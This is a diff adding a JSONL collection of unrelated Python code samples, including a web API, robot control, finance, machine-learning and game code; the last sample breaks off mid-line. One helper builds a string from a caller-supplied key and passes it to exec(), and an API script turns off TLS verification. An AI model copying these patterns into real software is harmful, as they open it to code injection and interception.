diff --git "a/6518.jsonl" "b/6518.jsonl" new file mode 100644--- /dev/null +++ "b/6518.jsonl" @@ -0,0 +1,669 @@ +{"seq_id":"389790007","text":"\"\"\"LCS web app.\"\"\"\nfrom pathlib import Path\nfrom typing import List, Sequence\n\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel, Field, validator\nfrom starlette.applications import Starlette\nfrom starlette.responses import RedirectResponse\nfrom starlette.staticfiles import StaticFiles\n\nfrom lcs.main import matches\n\n\nAPI = FastAPI(title=\"LCS\", description=\"Longest Common String\")\nAPP = Starlette()\n\n\nclass String(BaseModel):\n \"\"\"Individual string item.\"\"\"\n\n value: str = Field(\n min_length=1, max_length=1024,\n )\n\n\nclass SetOfStrings(BaseModel):\n \"\"\"Set of strings to query for LCS.\"\"\"\n\n setOfStrings: List[String] = Field(min_items=2, max_items=1024)\n\n @validator(\"setOfStrings\")\n def _check_and_convert(cls, values):\n strs = [x_.value for x_ in values]\n if len(strs) != len(set(strs)):\n raise ValueError(\"strings must be unique.\")\n return strs\n\n\nclass LCSResults(BaseModel):\n \"\"\"Longest common substring results.\"\"\"\n\n lcs: Sequence[String]\n\n\n@API.post(\"/\", response_model=LCSResults, tags=[\"Query\"])\nasync def query(strings: SetOfStrings):\n \"\"\"Endpoint to search for LCS.\"\"\"\n return LCSResults(lcs=[String(value=x_) for x_ in matches(strings.setOfStrings)])\n\n\n@API.get(\"/\", tags=[\"Redirect\"])\nasync def to_docs():\n \"\"\"Redirects from API root to OpenAPI documention.\"\"\"\n return RedirectResponse(url=\"/lcs/docs\")\n\n\ndef main():\n \"\"\"Attach mounts and routes.\"\"\"\n web_dir = Path(__file__).parent.joinpath(\"html\")\n APP.add_route(\"/\", StaticFiles(directory=web_dir, html=True), name=\"home\")\n APP.mount(\"/css\", StaticFiles(directory=web_dir.joinpath(\"css\")), name=\"css\")\n APP.mount(\"/lcs\", API, name=\"api\")\n\n\nif __name__ == \"__main__\":\n raise RuntimeError(\"These aren't the droids you're looking for.\")\n\nmain()\n","sub_path":"src/lcs/web/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"412165654","text":"\n\nfrom xai.brain.wordbase.verbs._vitiate import _VITIATE\n\n#calss header\nclass _VITIATING(_VITIATE, ):\n\tdef __init__(self,): \n\t\t_VITIATE.__init__(self)\n\t\tself.name = \"VITIATING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"vitiate\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_vitiating.py","file_name":"_vitiating.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"304849708","text":"def print_obj_key(obj,key):\n import json\n with open(obj) as f:\n data = json.load(f)\n #print(data)\n keystr = key\n #print(keystr)\n str = \"print(data\"\n #print(str)\n #print(len(keystr))\n while len(keystr)>0:\n str = str + \"['\" + keystr[0:1] + \"']\"\n #print(str)\n keystr = keystr[2:]\n #print(keystr)\n #print(len(keystr))\n str = str + ')'\n #print(str)\n exec(str)\n","sub_path":"f_output_obj_key.py","file_name":"f_output_obj_key.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"421325934","text":"#! /usr/bin/python3\n\nfrom Communication_Interfaces import Communication_Interfaces\nfrom Open_Interface import Open_Interface\nfrom SRF08 import SRF08\nfrom time import sleep\nimport os\nimport sys\n\ndef wander (OI, SRL, SRR):\n SRL.do_ranging()\n SRR.do_ranging()\n OI.Get_All_Sensors()\n\n nearest_left = SRL.ranges[0]\n nearest_right = SRR.ranges[0]\n \n next_nearest_left = SRL.ranges[1]\n next_nearest_right = SRR.ranges[1]\n\n left = next_nearest_right - (next_nearest_right - nearest_right)\n right = next_nearest_left - (next_nearest_left - nearest_left)\n\n print(nearest_left, nearest_right, next_nearest_left, next_nearest_right, left, right)\n\n OI.Drive_Direct(left, right)\n\n# print(\"SRL light: {0}\\tRanges: {1}\".format(SRL.light, SRL.ranges))\n# print(\"SRR light: {0}\\tRanges: {1}\".format(SRR.light, SRR.ranges))\n# print(\"Bumps L R: {0} {1}\".format(OI.Bump_Left(), OI.Bump_Right())\n# print(\"Wheeldrop L R C: {0} {1} {2}\".format(OI.Wheeldrop_Left(), OI.Wheeldrop_Right(), OI.Wheeldrop_Caster())\n# print(\"Wall Seen: {0}\".format(OI.Wall_Seen())\n# print(\"Cliff Seen L FL FR R: {0} {1} {2} {3}\".format(OI.Cliff_Seen_Left(), OI.Cliff_Seen_Front_Left(), OI.Cliff_Seen_Front_Right(), OI.Cliff_Seen_Right())\n# print(\"Virtual Wall Seen: {0}\".format(OI.Virtual_Wall_Seen())\n# print(\"Overcurrent LSD0 LSD1 LSD2 LW RW: {0} {1} {2} {3} {4}\".format(OI.Overcurrent_LSD0(), OI.Overcurrent_LSD1(), OI.Overcurrent_LSD2(), OI.Overcurrent_Left_Wheel(), OI.Overcurrent_Right_Wheel())\n# print(\"IR Byte: {0}\".format(OI.IR_Byte())\n# print(\"Buttons Advance Play: {0} {1}\".format(OI.Button_Play_Pressed(), OI.Button_Advance_Pressed())\n# print(\"Last Distance Angle: {0} {1}\".format(OI.Last_Distance(), OI.Last_Angle())\n# print(\"Charging State: {0}\".format(OI.Charging_State())\n# print(\"Battery Voltage Current Temp Charge Capacity: {0} {1} {2} {3} {4}\".format(OI.Battery_Voltage(), OI.Battery_Current(), OI.Battery_Temperatur(), OI.Battery_Charge(), OI.Battery_Capacity()))\n# print(\"Wall Signal: {0}\".format(OI.Wall_Signal()))\n# print(\"Cliff Signal L FL FR R: {0} {1} {2} {3}\".format(OI.CLiff_Left_Signal(), OI.Cliff_Front_Left_Signal(), OI.Cliff_Front_Right_Signal(), OI.Cliff_Right_Signal()))\n# print(\"Charging HomeBase Internal: {0} {1}\".format(OI.Charging_Home_Base(), OI.Charging_Internal()))\n# print(\"OI Mode: {0}\".format(OI.OI_Mode()))\n# print(\"Last DriveVel DriveRad RightVel LeftVel: {0} {1} {2} {3}\".format(OI.Last_Drive_Velocity(), OI.Last_Drive_Radius(), OI.Last_Right_Velocity(), OI.Last_Left_Velocity()))\n\nif __name__ == \"__main__\":\n CI = Communication_Interfaces()\n OI = Open_Interface(CI.uart_read, CI.uart_write)\n SRL = SRF08(CI.i2c_read, CI.i2c_write, 0x72)\n SRR = SRF08(CI.i2c_read, CI.i2c_write, 0x76)\n\n while (True):\n wander(OI, SRL, SRR)\n if (OI.Wheeldrop_Caster() == True):\n OI.Start()\n sys.exit()\n\n","sub_path":"wander.py","file_name":"wander.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"391088256","text":"# Task name: get profile details of Era DB\n# Description: The propose of this script is to provision Oracle DB on ERA\n#\n# Version: v1.0\n# Author: Husain Ebrahim \n\n# ERA API call function\n# ================================================================\nimport requests\n\n\ndef get_cluster_id (name=''):\n url = '{}/clusters'.format(base_url)\n resp = requests.get(url, **kwargs)\n if resp.status_code == 200:\n return resp.json()[0]['id']\n\n\ndef get_all_parameters(profiles):\n url = '{}/profiles'.format(base_url)\n resp = requests.get(url, **kwargs)\n if resp.status_code == 200:\n for profile in resp.json():\n if profile['topology'] == 'ALL' or profile['topology'] == 'single':\n if profile['engineType'] == 'Generic' or profile['engineType'] == 'oracle_database':\n profiles[profile['type'].lower()] = {'id': profile['id'],\n 'name': profile['name'],\n 'version': profile['versions'][0]['id']}\n\n return profiles\n\n\ndef get_sla_id(sla_name='NONE'):\n url = '{}/slas'.format(base_url)\n resp = requests.get(url, **kwargs)\n\n if resp.status_code:\n for sla in resp.json():\n if sla['name'] == sla_name:\n return sla['id']\n\n# ##########################################################################################\n# Main task function\n# ##########################################################################################\n\n\nbase_url = 'https://@@{ERA_IP}@@/era/v0.9'\nkwargs = {\n 'verify': False,\n 'auth': ('@@{ERA_USERNAME}@@', '@@{ERA_PASSWORD}@@')\n}\nprofiles = {\n 'software': {'name': '@@{SOFTWARE_PROFILE}@@', 'id': ''},\n 'compute': {'name': '@@{COMPUTE_PROFILE}@@', 'id': ''},\n 'network': {'name': '@@{NETWORK_PROFILE}@@', 'id': ''},\n 'database_parameter': {'name': '@@{DATABASE_PARAMETER}@@', 'id': ''}\n}\n\ndb_name = '@@{DB_NAME}@@'\n\ncluster_id = get_cluster_id()\nprofiles = get_all_parameters(profiles)\nsla_id = get_sla_id()\n\nprint('CLUSTER_ID={}'.format(cluster_id))\nprint('SOFTWARE_ID={}'.format(profiles['software']['id']))\nprint('SOFTWARE_VERSION={}'.format(profiles['software']['version']))\nprint('COMPUTE_ID={}'.format(profiles['compute']['id']))\nprint('NETWORK_ID={}'.format(profiles['network']['id']))\nprint('DB_PARAMETER={}'.format(profiles['database_parameter']['id']))\nprint('SLA_ID={}'.format(sla_id))\n\n","sub_path":"blueprints/era_oracle/scripts/era_get_profile_ids.py","file_name":"era_get_profile_ids.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"114197790","text":"from __future__ import division\nimport numpy as np\nimport scipy.misc\nfrom scipy.optimize import newton\nfrom copy import copy\nfrom curve import Curve\n\nBP = 0.0001\n\n\nclass CashFlow(object):\n\n def __init__(self, cashflow):\n if type(cashflow) is dict:\n self._cashflow = cashflow\n elif type(cashflow[0]) is tuple:\n self._cashflow = {t: Ct for t, Ct in cashflow}\n\n def __repr__(self):\n t, C = self.profile\n return '{}\\n{}'.format(str(t), str(C))\n\n def __getitem__(self, t):\n if t not in self._cashflow:\n return 0\n else:\n return self._cashflow[t]\n\n def __mul__(self, scalar):\n __cashflow_copy = copy(self._cashflow)\n for t in __cashflow_copy:\n __cashflow_copy[t] *= scalar\n return CashFlow(__cashflow_copy)\n\n def __add__(self, cashflow):\n __cashflow_copy = copy(self._cashflow)\n for t in cashflow.cashflow_tuples:\n if t not in __cashflow_copy:\n __cashflow_copy[t] = cashflow[t]\n else:\n __cashflow_copy[t] += cashflow[t]\n return CashFlow(__cashflow_copy)\n\n @property\n def cashflow_tuples(self):\n return self._cashflow\n\n @property\n def profile(self):\n profile = [(t, Ct) for t, Ct in self._cashflow.items()]\n profile = sorted(profile, key=lambda a: a[0])\n t = map(lambda a: a[0], profile)\n C = map(lambda a: a[1], profile)\n return t, C\n\n @classmethod\n def CouponBond(cls, par, c, t0, T, n=2):\n cashflow, t, C = dict(), t0 + 1 / n, c * par / n\n while t <= T:\n cashflow[t] = C\n t += 1 / n\n if T in cashflow:\n cashflow[T] += par\n else:\n cashflow[T] = par\n return cls(cashflow)\n\n @classmethod\n def Annuity(cls, A, t0, T, n=2):\n cashflow, t = dict(), t0 + 1 / n\n while t <= T:\n cashflow[t] = A / n\n t += 1 / n\n return cls(cashflow)\n\n @staticmethod\n def replicate(target, securities):\n t, C = target.profile\n C = np.array(C).reshape(len(C), 1)\n cashflow_space = np.array([\n [security[tau] for tau in t]\n for security in securities\n ]).T\n w = np.linalg.solve(cashflow_space, C)\n return w, cashflow_space\n\n def price(self, disc):\n price = 0\n if type(disc) is dict:\n for t, Ct in self._cashflow.items():\n assert (t in disc)\n price += Ct * disc[t]\n elif hasattr(disc, '__call__'):\n for t, Ct in self._cashflow.items():\n price += Ct * disc(t)\n else:\n raise TypeError\n return price\n\n def derivative(self, y, order):\n def __price_with_single_rate(__y):\n return self.price(Curve.SingleRateCurve(__y))\n return scipy.misc.derivative(\n __price_with_single_rate, x0=y,\n dx=1e-5, n=order)\n\n def dv01(self, y):\n return -self.derivative(y, 1) * BP\n\n def duration(self, y):\n return -self.derivative(y, 1) / self.price(\n Curve.SingleRateCurve(y))\n\n def convexity(self, y):\n return self.derivative(y, 2) / self.price(\n Curve.SingleRateCurve(y))\n\n\n\nif __name__ == '__main__':\n ln = Curve.LinearInterpolation([(0.5, 1/1.01), (15, 1/(1.025**30))])\n a1 = CashFlow.Annuity(1, 0, 10)\n a2 = CashFlow.Annuity(10, 0, 5)\n zcb = CashFlow({10: 100})\n cb = CashFlow.CouponBond(100, 10000, 0, 10)\n print(1/ln(10))\n print(ln.calibrate(a1, a1.price(ln)))\n print(ln.calibrate(a2, a2.price(ln)))\n print(Curve.calibrate(zcb, zcb.price(ln)))\n print(Curve.calibrate(cb, cb.price(ln)))","sub_path":"cashflow.py","file_name":"cashflow.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"304638614","text":"# Check if a given string is a palindrome or not\n# Returns 0 if string is not a palindrome\n# O (n) running time where n is the size of the input string\ndef palindromeStringCheck(s):\n size = len(s)\n i,j = 0,len(s)-1\n while(i=0):\n if s[i] != s[j]:\n return 0\n i+=1\n j-=1\n return 1\n\npalindromeStringCheck('abcba')","sub_path":"palindromeStringCheck.py","file_name":"palindromeStringCheck.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"277816329","text":"import re\nimport unittest\nfrom project import create_app, db\nfrom project.serate.models import Serata\nfrom project.corsi.models import Corso\nfrom project.tags.models import Tag\n\nclass FlaskClientTestCase(unittest.TestCase):\n def setUp(self):\n self.app = create_app('testing')\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n Tag.insert_test_tags()\n self.client = self.app.test_client()\n #self.client = self.app.test_client(use_cookies=True)\n '''\n self.client instance variable is the Flask test client object. \n This object exposes methods that issue requests into the application\n \n When the test client is created with the use_cookies option enabled, \n it will accept and send cookies in the same way browsers do, so functionality\n that relies on cookies to recall context between requests can be used\n '''\n\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def test_lista_serate(self):\n response = self.client.get('/serate/prossime')\n self.assertEqual(response.status_code, 200)\n self.assertTrue('Python Biella Group' in response.get_data(as_text=True))\n\n def test_lista_tags(self):\n response = self.client.get('/tags/')\n # Funzione visibile solo da utenti autenticati\n self.assertEqual(response.status_code, 302)\n\n","sub_path":"Flask/Lezione7/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"138512960","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 18 18:09:49 2017\r\n\r\n@author: lihepeng\r\n\"\"\"\r\n\r\ndef ewh_pmin_pmax(T_old, flow_rate):\r\n \r\n delta_t = 1/12\r\n \r\n Tin = 60\r\n T_air = 75\r\n d = 8.34\r\n Cp = 1.0069\r\n volume = 15\r\n SA = 24.1\r\n R = 15/3\r\n Q = 3412\r\n \r\n C = volume * d * Cp\r\n G = SA / R\r\n B = d * flow_rate * Cp\r\n R1 = 1/(G + B)\r\n \r\n coff = np.exp(-delta_t/(R1*C))\r\n \r\n pmin_ewh = ( (120 - T_old * coff) / (1 - coff) - G*R1*T_air - B*R1*Tin ) / (delta_t*Q*R1)\r\n \r\n pmax_ewh = ( (130 - T_old * coff) / (1 - coff) - G*R1*T_air - B*R1*Tin ) / (delta_t*Q*R1)\r\n \r\n return pmin_ewh, pmax_ewh\r\n ","sub_path":"data_process/ewh_pmin_pmax.py","file_name":"ewh_pmin_pmax.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"266116473","text":"\"\"\"\nThis module contains helper methods that wrap sklearn prediction models.\n\"\"\"\nimport pandas as pd\nfrom sklearn.dummy import DummyClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier, BaggingClassifier, \\\n AdaBoostClassifier\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nfrom .result import PredictionResult, ResultCollection\nfrom .util import wrap_list\n\nclass Trainer:\n \"\"\"\n Provides model training methods for a particular set of training data.\n \"\"\"\n def __init__(self, *dfs, label_colname=None, seed=None):\n self.dfs = dfs\n self.label_colname = label_colname\n self.seed = seed\n\n\n def dummy(self):\n \"\"\"\n Returns dummy classifier models using the 'stratified' technique.\n \"\"\"\n models = []\n for X, y in self._training_data():\n model = DummyClassifier(random_state=self.seed)\n model.fit(X, y)\n models.append(model)\n\n return models if len(models) > 1 else models[0]\n\n\n def logistic_regression(self, penalty='l2'):\n \"\"\"\n Returns logistic regression models fitted to the training data.\n \"\"\"\n models = []\n for X, y in self._training_data():\n model = LogisticRegression(solver='liblinear',\n penalty=penalty,\n random_state=self.seed)\n model.fit(X, y)\n models.append(model)\n\n return models if len(models) > 1 else models[0]\n\n\n def decision_tree(self, max_depth=None):\n \"\"\"\n Returns decision tree models fitted to the training data.\n \"\"\"\n models = []\n for X, y in self._training_data():\n model = DecisionTreeClassifier(max_depth=max_depth,\n random_state=self.seed)\n model.fit(X, y)\n models.append(model)\n\n return models if len(models) > 1 else models[0]\n\n\n def k_nearest(self, k=5):\n \"\"\"\n Returns k-nearest neighbors models fitted to the training data.\n \"\"\"\n models = []\n for X, y in self._training_data():\n model = KNeighborsClassifier(n_neighbors=k)\n model.fit(X, y)\n models.append(model)\n\n return models if len(models) > 1 else models[0]\n\n\n def linear_svm(self, c=1):\n \"\"\"\n Returns linear svm models fitted to the training data.\n \"\"\"\n models = []\n for X, y in self._training_data():\n # Prefer dual=False when n_samples > n_features\n model = Pipeline([('scale', StandardScaler()),\n ('svm', LinearSVC(C=c, dual=False,\n random_state=self.seed))])\n model.fit(X, y)\n models.append(model)\n\n return models if len(models) > 1 else models[0]\n\n\n def forest(self, n_trees=10):\n \"\"\"\n Returns random forest models fitted to the training data.\n \"\"\"\n models = []\n for X, y in self._training_data():\n model = RandomForestClassifier(n_estimators=n_trees,\n random_state=self.seed)\n model.fit(X, y)\n models.append(model)\n\n return models if len(models) > 1 else models[0]\n\n\n def bagging(self, n_estimators=10):\n \"\"\"\n Returns bagging models fitted to the training data.\n\n Underlying base estimator is a decision tree.\n \"\"\"\n models = []\n for X, y in self._training_data():\n model = BaggingClassifier(n_estimators=n_estimators,\n random_state=self.seed)\n model.fit(X, y)\n models.append(model)\n\n return models if len(models) > 1 else models[0]\n\n\n def boosting(self, n_estimators=10):\n \"\"\"\n Returns boosting models fitted to the training data.\n\n Underlying base estimator is a decision tree.\n \"\"\"\n models = []\n for X, y in self._training_data():\n model = AdaBoostClassifier(n_estimators=n_estimators,\n random_state=self.seed)\n model.fit(X, y)\n models.append(model)\n\n return models if len(models) > 1 else models[0]\n\n\n def train_all(self, parameters={}, exclude=[]):\n \"\"\"\n Train all the things.\n\n Returns a dictionary with method names as keys and models as values.\n \"\"\"\n methods = {\n 'dummy': self.dummy,\n 'logistic_regression': self.logistic_regression,\n 'decision_tree': self.decision_tree,\n 'k_nearest': self.k_nearest,\n 'linear_svm': self.linear_svm,\n 'forest': self.forest,\n 'bagging': self.bagging,\n 'boosting': self.boosting\n }\n\n models = dict()\n\n for name, func in methods.items():\n if name in exclude:\n next\n\n params = parameters.get(name) or {}\n models[name] = func(**params)\n\n return models\n\n\n def _training_data(self):\n for df in self.dfs:\n X = df.drop(columns=[self.label_colname]).values\n y = df[self.label_colname].values\n yield X, y\n\n\nclass Tester:\n \"\"\"\n Provides test methods for a particular set of test data.\n \"\"\"\n def __init__(self, *dfs, label_colname=None):\n self.dfs = dfs\n self.label_colname = label_colname\n\n\n def test(self, *models, threshold=None):\n \"\"\"\n Uses the fitted models to generate a prediction result dataframe.\n\n Model results are \"stacked\": They are assumed to be the results of the\n same conceptual model applied to different splits.\n \"\"\"\n results = self._test(*models)\n if len(results) > 1:\n return ResultCollection.from_stack(results)\n else:\n return results[0]\n\n\n def _test(self, *models, threshold=None):\n if len(models) != len(self.dfs):\n raise Exception(f\"Number of models ({len(models)}) does not match\"\n f\" test sets ({len(self.dfs)}).\")\n\n results = []\n for (X, y_actual), model in zip(self._test_data(), models):\n if isinstance(model, Pipeline) and \\\n isinstance(model.named_steps.svm, LinearSVC):\n y_score = model.decision_function(X)\n else:\n y_score = model.predict_proba(X)[:,1]\n\n y_predict = model.predict(X)\n df_results = pd.DataFrame({ 'actual': y_actual,\n 'score': y_score,\n 'predict': y_predict },\n dtype=float)\n results.append(PredictionResult(df_results))\n\n if threshold:\n results = [r.with_threshold(threshold) for r in results]\n\n return results\n\n\n def evaluate(self, model_dict, thresholds=None):\n \"\"\"\n Tests lots of different models at different thresholds.\n \"\"\"\n collection = ResultCollection()\n for name, model in model_dict.items():\n result = self._test(model)[0] # Hack for now\n\n if thresholds:\n results = result.with_thresholds(thresholds)\n this_collection = ResultCollection.from_stack(results,\n index=thresholds)\n collection.join(name, this_collection)\n else:\n collection.join(name, result)\n\n return collection\n\n\n def evaluate_splits(self, model_dict, threshold=None):\n \"\"\"\n Tests lots of different models over different splits.\n \"\"\"\n collection = ResultCollection()\n for name, models in model_dict.items():\n results = self._test(*models, threshold=threshold)\n this_collection = ResultCollection.from_stack(results)\n collection.join(name, this_collection)\n\n return collection\n\n\n def _test_data(self):\n for df in self.dfs:\n X = df.drop(columns=[self.label_colname]).values\n y_actual = df[self.label_colname].values\n yield X, y_actual\n","sub_path":"hw3/pipeline/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":8500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"250157294","text":"import logging\n\nfrom django.http import Http404\n\nfrom hitch import request_local_context\nfrom hitch.support.util import format_mapped_data\n\nlog = logging.getLogger('hitch')\n\nclass RequestMiddleware(object):\n def process_request(self, request):\n request_local_context.request = request\n \n chain = request.META.get('HTTP_X_FORWARDED_FOR')\n if chain:\n request.ip = chain.split(',')[0].strip()\n else:\n request.ip = request.META.get('REMOTE_ADDR')\n \n request.posting = (request.method == 'POST')\n request.scheme = ('https' if request.META.get('HTTPS') in ('on', '1') else 'http')\n\nclass UncaughtExceptionMiddleware(object):\n def process_exception(self, request, exception):\n if isinstance(exception, Http404):\n return\n \n lines = ['UNCAUGHT %s: %s' % (type(exception).__name__, str(exception))]\n if request.GET:\n lines.append('GET: %s' % format_mapped_data(request.GET))\n elif request.POST:\n lines.append('POST: %s' % format_mapped_data(request.POST))\n log.exception('\\n'.join(lines))","sub_path":"hitch/support/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"142688051","text":"from guizero import*\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nimport string\r\nimport random\r\n\r\napp = App(layout=\"grid\",title=\"Skrabble\",width=800,height=705)\r\n\r\nalphabet = list(string.ascii_uppercase)\r\n\r\ndef Play():\r\n global DrawButton,z,no_of_players,NextButton \r\n message1.visible=False\r\n combo.visible=False\r\n playbutton.visible=False\r\n no_of_players = int(combo.value)\r\n AddInfo()\r\n AddBag()\r\n text = \"Click to take a tile from the bag!\\nTiles remaining: \"+str(len(alltiles))\r\n DrawButton = PushButton(app,grid=[0,6,4,1],text=text,command=TakeTile)\r\n DrawButton.text_size=15\r\n DrawButton.bg=\"powder blue\"\r\n ShowHand()\r\n NextButton = PushButton(app,grid=[0,13,4,1],text=\"Finish Turn\",enabled=False,command=NextTurn)\r\n NextButton.text_size=15\r\n NextButton.bg=\"red\"\r\n NextTurn()\r\n\r\ndef AddDialogue():\r\n global message1,combo,playbutton\r\n ctrlframe = Box(app,layout=\"grid\",grid=[0,0,4,17],width=583,height=705)\r\n message1 = Text(app, grid=[0,4,4,1],text=\"How many players?\",size=30,width = 25)\r\n combo = Combo(app,options=[2,3,4],width=10,grid=[0,8,4,1])\r\n combo.text_size=20\r\n combo.bg=\"white\"\r\n playbutton = PushButton(app,text=\"PLAY\",grid=[0,12,4,1],width=7,command=Play)\r\n playbutton.text_size=50\r\n playbutton.bg=\"green2\"\r\n\r\nAddDialogue()\r\n\r\nx3word = [18,25,32,137,151,256,263,270]\r\nx2word = [36,48,54,64,72,80,90,96,144,192,198,208,216,224,234,240,252]\r\nx3letter = [40,44,104,108,112,116,172,176,180,184,244,248]\r\nx2letter = [21,29,58,60,69,76,83,122,126,128,132,140,148,156,\r\n 160,162,166,205,212,219,228,230,259,267]\r\n\r\ndef BoardDesign(a,last):\r\n\r\n\r\n if a in x3word:\r\n squares[last].tk.configure(bg=\"red\",font=\"Helvetica 9 bold\")\r\n squares[last].text=\"TRIPLE\\nWORD\\nSCORE\"\r\n \r\n elif a in x2word:\r\n squares[last].tk.configure(bg=\"LightPink2\",font=\"Helvetica 9 bold\")\r\n squares[last].text=\"DOUBLE\\nWORD\\nSCORE\"\r\n \r\n elif a in x3letter:\r\n squares[last].tk.configure(bg=\"dodger blue\",font=\"Helvetica 9 bold\")\r\n squares[last].text=\"TRIPLE\\nLETTER\\nSCORE\"\r\n\r\n elif a in x2letter:\r\n squares[last].tk.configure(bg=\"light blue\",font=\"Helvetica 9 bold\")\r\n squares[last].text=\"DOUBLE\\nLETTER\\nSCORE\"\r\n else:\r\n squares[last].bg=\"light sea green\"\r\n squares[last].text=\"\"\r\n\r\ntileindex = \"\"\r\n\r\ndef SelectSquare(a):\r\n global tileindex,TilesUsed\r\n\r\n if squares[a].bg == \"light goldenrod\":\r\n pass\r\n if squares[a].bg == \"goldenrod1\":\r\n UsedIndex = SquaresUsed.index(a)\r\n hand[TilesUsed[UsedIndex]].text=squares[a].text\r\n hand[TilesUsed[UsedIndex]].bg=\"light goldenrod\"\r\n hand[TilesUsed[UsedIndex]].enabled=True\r\n hand[TilesUsed[UsedIndex]].text_color=\"black\"\r\n TilesUsed.pop(UsedIndex)\r\n SquaresUsed.remove(a) \r\n BoardDesign(a,a)\r\n else:\r\n if tileindex != \"\":\r\n squares[a].tk.configure(bg=\"goldenrod1\",font=\"Helvetica 9 bold\")\r\n squares[a].text=hand[tileindex].text\r\n hand[tileindex].bg=\"SystemButtonFace\"\r\n hand[tileindex].text=\"\"\r\n hand[tileindex].enabled=False\r\n TilesUsed.append(tileindex)\r\n SquaresUsed.append(a)\r\n tileindex = \"\"\r\n\r\ndef SetBoard():\r\n global a,squares,boardframe\r\n global squares\r\n boardframe = Box(app,layout=\"grid\",grid=[4,0,1,17])\r\n boardframe.bg=\"turquoise4\"\r\n squares = list()\r\n y = 0\r\n x = 0\r\n for a in range(289):\r\n if a % 17 == 0 and a!=0:\r\n y += 1\r\n x -= 17 \r\n if x in [0,16]:\r\n row = a//17\r\n squares.append(Text(boardframe,grid=[x,y],\r\n text=alphabet[row-1],color=\"white\",\r\n width=2,height=1))\r\n elif y in [0,16]:\r\n squares.append(Text(boardframe,grid=[x,y],\r\n text=x,color=\"white\",\r\n width=3))\r\n else:\r\n squares.append(PushButton(boardframe,grid=[x,y],width=3,height=1,\r\n command=lambda a=a: SelectSquare(a))) \r\n squares[-1].tk.configure(borderwidth=2)\r\n last=-1\r\n BoardDesign(a,last)\r\n if squares[-1].value in [\"Z\",\"P\"]:\r\n squares[-1].value=\"\"\r\n x += 1\r\n\r\nSetBoard()\r\n\r\ndef AddInfo():\r\n global playerinfo,scores\r\n playerinfo = list()\r\n scores = []\r\n for z in range(no_of_players):\r\n scores.append(0)\r\n text = \"Player \"+str(z+1)+\"\\n\\nScore: \"+str(scores[z])\r\n playerinfo.append(PushButton(app,text=str(text),grid=[z,0],width=8))\r\n playerinfo[-1].text_size=15\r\n playerinfo[-1].bg=\"white\"\r\n if no_of_players==2:\r\n playerinfo[-1].grid=[2*z,0,2,1]\r\n playerinfo[-1].width=17\r\n if no_of_players==3:\r\n playerinfo[-1].width=10\r\n if z == 1:\r\n playerinfo[-1].grid=[z,0,2,1]\r\n if z == 2:\r\n playerinfo[-1].grid=[3,0]\r\n \r\n\r\nturn=0\r\nmovecount=0\r\n\r\nTilesUsed = []\r\nSquaresUsed = []\r\n\r\nalignment = \"null\"\r\n\r\ndef AddScore():\r\n global alignment\r\n if SquaresUsed != []:\r\n if len(SquaresUsed) !=1:\r\n diff = abs(SquaresUsed[0]-SquaresUsed[1])\r\n if diff < 17:\r\n alignment = \"horizontal\"\r\n else:\r\n alignment = \"vertical\"\r\n print(alignment)\r\n else:\r\n alignment = \"vertical\"\r\n \r\n words = [] \r\n for i in SquaresUsed:\r\n word = [] \r\n if alignment == \"vertical\":\r\n #print(SquaresUsed)\r\n checkleft = 1\r\n Scanleft = True\r\n \r\n while Scanleft == True:\r\n if squares[i-checkleft].bg == \"light goldenrod\":\r\n #print(squares[i-checkleft].text)\r\n word.append(squares[i-checkleft].text)\r\n else:\r\n Scanleft = False \r\n checkleft+=1\r\n\r\n word.append(squares[i].text)\r\n \r\n Scanright = True\r\n checkright = 1\r\n while Scanright == True:\r\n if squares[i+checkright].bg == \"light goldenrod\":\r\n #if len(squares[i+checkright].text) == 1:\r\n #print(squares[i+checkright].text)\r\n word.append(squares[i+checkright].text)\r\n else:\r\n Scanright = False \r\n checkright+=1\r\n\r\n #print(word)\r\n if len(word) > 1:\r\n words.append(word)\r\n print(words)\r\n \r\n\r\n \r\n scoremultiply = 1\r\n score = 0\r\n for i in SquaresUsed:\r\n #print(i)\r\n letter = squares[i].text\r\n #print(letter)\r\n letterindex = alphabet.index(letter)\r\n value = points[letterindex]\r\n #print(value)\r\n if i in x2letter:\r\n value *= 2\r\n elif i in x3letter:\r\n value *= 